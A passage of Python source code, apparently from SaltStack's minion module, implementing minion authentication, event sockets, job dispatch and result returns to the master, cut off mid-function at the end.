self._init_context_and_poller()
id_hash = hashlib.md5(self.opts['id']).hexdigest()
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def _gen_minions(self):
'''
Set up and tune in the minion options
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
return False
minions = []
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
try:
minions.append(Minion(s_opts, 5, False))
except SaltClientError:
minions.append(s_opts)
return minions
def minions(self):
'''
Return a list of minion generators bound to the tune_in method
'''
ret = {}
minions = self._gen_minions()
for minion in minions:
if isinstance(minion, dict):
ret[minion['master']] = minion
else:
ret[minion.opts['master']] = {
'minion': minion,
'generator': minion.tune_in_no_block()}
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
module_refresh = False
pillar_refresh = False
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
last = time.time()
auth_wait = self.opts['acceptance_wait_time']
max_wait = auth_wait * 6
while True:
for minion in minions.values():
if isinstance(minion, dict):
continue
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
while True:
package = self.epull_sock.recv(zmq.NOBLOCK)
if package.startswith('module_refresh'):
module_refresh = True
elif package.startswith('pillar_refresh'):
pillar_refresh = True
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
pass
# get commands from each master
for master, minion in minions.items():
if 'generator' not in minion:
if time.time() - auth_wait > last:
last = time.time()
if auth_wait < max_wait:
auth_wait += auth_wait
try:
if not isinstance(minion, dict):
minions[master] = {'minion': minion}
t_minion = Minion(minion, 5, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
auth_wait = self.opts['acceptance_wait_time']
except SaltClientError:
continue
else:
continue
if module_refresh:
minion['minion'].module_refresh()
if pillar_refresh:
minion['minion'].pillar_refresh()
minion['generator'].next()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
        # Late setup of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
            log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
                      self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
        # if this is a *nix system AND modules_max_memory is set, let's enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts)
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
else:
return
sreq = salt.payload.SREQ(self.opts['master_uri'])
try:
sreq.send('aes', self.crypticle.dumps(load))
except Exception:
pass
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
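    # Illustrative shape of a publisher payload handled above (values are made
    # up; 'sig' is only present when pub signing is enabled):
    #     {'enc': 'aes', 'load': '<encrypted blob>', 'sig': '<signature>'}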
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, int(self.opts['random_reauth_delay']))
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None or not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
        # We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
sdata = {'pid': os.getpid()}
sdata.update(data)
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = parse_args_and_kwargs(func, data['arg'], data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, list):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR: {0}'.format(exc)
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
except TypeError as exc:
trb = traceback.format_exc()
aspec = salt.utils.get_function_argspec(
minion_instance.functions[data['fun']]
)
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info. Possibly a missing '
'arguments issue: {2}').format(function_name,
exc,
aspec)
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = msg
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = parse_args_and_kwargs(func, data['arg'][ind], data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
sreq = salt.payload.SREQ(self.opts['master_uri'])
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
try:
ret_val = sreq.send('aes', self.crypticle.dumps(load))
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
                   'overloaded. If the master is running, consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
if isinstance(ret_val, string_types) and not ret_val:
# The master AES key has changed, reauth
self.authenticate()
ret_val = sreq.send('aes', self.crypticle.dumps(load))
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
            with salt.utils.fopen(fn_, 'w+b') as fp_:
                fp_.write(self.serial.dumps(ret))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
            if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
            self.socket.setsockopt(
                zmq.RECONNECT_IVL_MAX,
                self.opts['recon_default'] + self.opts['recon_max']
            )
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds != 'retry':
log.info('Authentication with master successful!')
break
log.info('Waiting for minion key to be accepted by the master.')
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self):
'''
Refresh the functions and returners.
'''
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
        Python does not handle SIGTERM cleanly by default, so if it is
        signalled, exit the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
getpass.getuser()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
log.debug('Handling event {0!r}'.format(package))
try:
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh()
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
                # Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
                # Nothing to receive on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'poller'):
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts):
self._syndic_interface = opts.get('interface')
self._syndic = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'to' not in data or 'arg' not in data:
return
data['to'] = int(data['to']) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'])
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.LocalClient(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self.context = zmq.Context()
# Start with the publish socket
# Share the poller with the event object
self.poller = self.local.event.poller
self.socket = self.context.socket(zmq.SUB)
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
